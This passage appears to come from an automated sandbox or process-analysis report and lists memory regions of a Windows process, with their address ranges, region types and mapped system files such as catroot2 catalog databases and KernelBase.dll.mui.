0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 35957 start_va = 0x3d0000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 35958 start_va = 0x410000 end_va = 0x41dfff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 35959 start_va = 0x420000 end_va = 0x420fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 35960 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 35961 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 35962 start_va = 0x550000 end_va = 0x942fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 35963 start_va = 0x950000 end_va = 0x950fff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 35964 start_va = 0x960000 end_va = 0x96ffff entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 35965 start_va = 0x970000 end_va = 0x97ffff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 35966 start_va = 0x980000 end_va = 0x9bffff entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 35967 start_va = 0xa00000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 35968 start_va = 0xa10000 end_va = 0xa10fff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 35969 start_va = 0xa20000 end_va = 0xa5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 35970 start_va = 0xa60000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 35971 start_va = 0xaa0000 end_va = 0xaaffff entry_point = 0xaa0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35972 start_va = 0xae0000 end_va = 0xae1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 35973 start_va = 0xaf0000 end_va = 0xaf4fff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 35974 start_va = 0xb00000 end_va = 0xdcefff entry_point = 0xb00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 35975 start_va = 0xdd0000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 35976 start_va = 0xe10000 end_va = 0xe10fff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 35977 start_va = 0xe20000 end_va = 0xe2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 35978 start_va = 0xe30000 end_va = 0xe3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 35979 start_va = 0xe40000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 35980 start_va = 0xec0000 end_va = 0xec0fff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 35981 start_va = 0xed0000 end_va = 0xedffff entry_point = 0xed0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35982 start_va = 0xee0000 end_va = 0xf1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 35983 start_va = 0xf20000 end_va = 0xf2ffff entry_point = 0xf20000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35984 start_va = 0xf30000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 35985 start_va = 0xf70000 end_va = 0xf7ffff entry_point = 0xf70000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35986 start_va = 0xf80000 end_va = 0xf8ffff entry_point = 0xf80000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35987 start_va = 0xf90000 end_va = 0xf9ffff entry_point = 0xf90000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35988 start_va = 0xfa0000 end_va = 0xfaffff entry_point = 0xfa0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35989 start_va = 0xfb0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 35990 start_va = 0xff0000 end_va = 0xffffff entry_point = 0xff0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35991 start_va = 0x1000000 end_va = 0x103ffff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 35992 start_va = 0x1040000 end_va = 0x104ffff entry_point = 0x1040000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35993 start_va = 0x1050000 end_va = 0x105ffff entry_point = 0x1050000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35994 start_va = 0x1060000 end_va = 0x106ffff entry_point = 0x1060000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35995 start_va = 0x1070000 end_va = 0x107ffff entry_point = 0x1070000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35996 start_va = 0x1080000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 35997 start_va = 0x1180000 end_va = 0x118ffff entry_point = 0x1180000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35998 start_va = 0x1190000 end_va = 0x119ffff entry_point = 0x1190000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35999 start_va = 0x11a0000 end_va = 0x11affff entry_point = 0x11a0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36000 start_va = 0x11b0000 end_va = 0x11effff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 36001 start_va = 0x11f0000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 36002 start_va = 0x1200000 end_va = 0x120ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 36003 start_va = 0x1210000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 36004 start_va = 0x1220000 end_va = 0x122ffff entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 36005 start_va = 0x1230000 end_va = 0x123ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 36006 start_va = 0x1280000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 36007 start_va = 0x1380000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 36008 start_va = 0x13c0000 end_va = 0x13c0fff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 36009 start_va = 0x13d0000 end_va = 0x13d0fff entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 36010 start_va = 0x13e0000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x00000000013e0000" filename = "" Region: id = 36011 start_va = 0x13f0000 end_va = 0x13fffff entry_point = 0x13f0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 36012 start_va = 0x1400000 end_va = 0x140ffff entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 36013 start_va = 0x1410000 end_va = 0x141ffff entry_point = 0x1410000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36014 start_va = 0x1420000 end_va = 0x145ffff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 36015 start_va = 0x1460000 end_va = 0x146ffff entry_point = 0x1460000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36016 start_va = 0x1480000 end_va = 0x148ffff entry_point = 0x1480000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36017 start_va = 0x1490000 end_va = 0x149ffff entry_point = 0x1490000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36018 start_va = 0x14a0000 end_va = 0x14affff entry_point = 0x14a0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36019 start_va = 0x14b0000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 36020 start_va = 0x14c0000 end_va = 0x15bffff entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 36021 start_va = 0x15c0000 end_va = 0x15cffff entry_point = 0x15c0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36022 start_va = 0x15d0000 end_va = 0x15dffff entry_point = 0x15d0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36023 start_va = 0x15e0000 end_va = 0x15effff entry_point = 0x15e0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36024 start_va = 0x1630000 end_va = 0x163ffff entry_point = 0x1630000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36025 start_va = 0x1640000 end_va = 0x164ffff entry_point = 0x1640000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36026 start_va = 0x1650000 end_va = 0x165ffff entry_point = 0x1650000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36027 start_va = 0x1660000 end_va = 0x166ffff entry_point = 0x1660000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36028 start_va = 0x1670000 end_va = 0x167ffff entry_point = 0x1670000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36029 start_va = 0x1680000 end_va = 0x16bffff entry_point = 0x0 region_type = private name = "private_0x0000000001680000" filename = "" Region: id = 36030 start_va = 0x16c0000 end_va = 0x16cffff entry_point = 0x16c0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36031 start_va = 0x16d0000 end_va = 0x16dffff entry_point = 0x16d0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36032 start_va = 0x16e0000 end_va = 0x16effff entry_point = 0x16e0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36033 start_va = 0x16f0000 end_va = 0x172ffff entry_point = 0x0 region_type = private name = "private_0x00000000016f0000" filename = "" Region: id = 36034 start_va = 0x1730000 end_va = 0x17effff entry_point = 0x1730000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 36035 start_va = 0x17f0000 end_va = 0x18affff entry_point = 0x0 region_type = private name = "private_0x00000000017f0000" filename = "" Region: id = 36036 start_va = 0x18f0000 end_va = 0x18fffff entry_point = 0x18f0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36037 start_va = 0x1900000 end_va = 0x19fffff entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 36038 start_va = 0x1a00000 end_va = 0x1a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 36039 start_va = 0x1a40000 end_va = 0x1a4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a40000" filename = "" Region: id = 36040 start_va = 0x1a50000 end_va = 0x1a5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a50000" filename = "" Region: id = 36041 start_va = 0x1a60000 end_va = 0x1a6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a60000" filename = "" Region: id = 36042 start_va = 0x1a70000 end_va = 0x1a7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a70000" filename = "" Region: id = 36043 start_va = 0x1a80000 end_va = 0x1a8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a80000" filename = "" Region: id = 36044 start_va = 0x1a90000 end_va = 0x1a9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a90000" filename = "" Region: id = 36045 start_va = 0x1aa0000 end_va = 0x1aaffff entry_point = 0x1aa0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36046 start_va = 0x1ab0000 end_va = 0x1abffff entry_point = 0x1ab0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36047 start_va = 0x1ac0000 end_va = 0x1bbffff entry_point = 0x0 region_type = private name = "private_0x0000000001ac0000" filename = "" Region: id = 36048 start_va = 0x1bc0000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 36049 start_va = 0x1cc0000 end_va = 0x1ccffff entry_point = 0x1cc0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36050 start_va = 0x1cd0000 end_va = 0x1cdffff entry_point = 0x1cd0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36051 start_va = 0x1ce0000 end_va = 0x1ceffff entry_point = 0x1ce0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36052 start_va = 0x1cf0000 end_va = 0x1cfffff entry_point = 0x1cf0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36053 start_va = 0x1d00000 end_va = 0x1d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 36054 start_va = 0x1d10000 end_va = 0x1d1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d10000" filename = "" Region: id = 36055 start_va = 0x1d20000 end_va = 0x1d2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d20000" filename = "" Region: id = 36056 start_va = 0x1d30000 end_va = 0x1d3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d30000" filename = "" Region: id = 36057 start_va = 0x1d40000 end_va = 0x1d4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d40000" filename = "" Region: id = 36058 start_va = 0x1d50000 end_va = 0x1d5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d50000" filename = "" Region: id = 36059 start_va = 0x1d60000 end_va = 0x1d6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d60000" filename = "" Region: id = 36060 start_va = 0x1d70000 end_va = 0x2d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 36061 start_va = 0x2d70000 end_va = 0x2d7ffff entry_point = 0x2d70000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36062 start_va = 0x2d80000 end_va = 0x2d8ffff entry_point = 0x2d80000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36063 start_va = 0x2d90000 end_va = 0x2d9ffff entry_point = 0x2d90000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36064 start_va = 0x2da0000 end_va = 0x2daffff entry_point = 0x2da0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36065 start_va = 0x2db0000 end_va = 0x2dbffff entry_point = 0x2db0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36066 start_va = 0x2dc0000 end_va = 0x2dcffff entry_point = 0x2dc0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36067 start_va = 0x2dd0000 end_va = 0x2ddffff entry_point = 0x2dd0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36068 start_va = 0x2de0000 end_va = 0x2deffff entry_point = 0x2de0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36069 start_va = 0x2df0000 end_va = 0x2dfffff entry_point = 0x2df0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36070 start_va = 0x2e00000 end_va = 0x2e0ffff entry_point = 0x2e00000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36071 start_va = 0x2e10000 end_va = 0x2e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 36072 start_va = 0x2e50000 end_va = 0x2e5ffff entry_point = 0x2e50000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36073 start_va = 0x2e60000 end_va = 0x2e6ffff entry_point = 0x2e60000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36074 start_va = 0x2e70000 end_va = 0x2e7ffff entry_point = 0x2e70000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36075 start_va = 0x2e80000 end_va = 0x2e8ffff entry_point = 0x2e80000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36076 start_va = 0x2e90000 end_va = 0x2e9ffff entry_point = 0x2e90000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36077 start_va = 0x2ea0000 end_va = 0x2eaffff entry_point = 0x2ea0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36078 start_va = 0x2eb0000 end_va = 0x2ebffff entry_point = 0x2eb0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36079 start_va = 0x2ec0000 end_va = 0x2ecffff entry_point = 0x2ec0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36080 start_va = 0x2ed0000 end_va = 0x2edffff entry_point = 0x2ed0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36081 start_va = 0x2ee0000 end_va = 0x2eeffff entry_point = 0x2ee0000 region_type = mapped_file name = "catdb" filename = 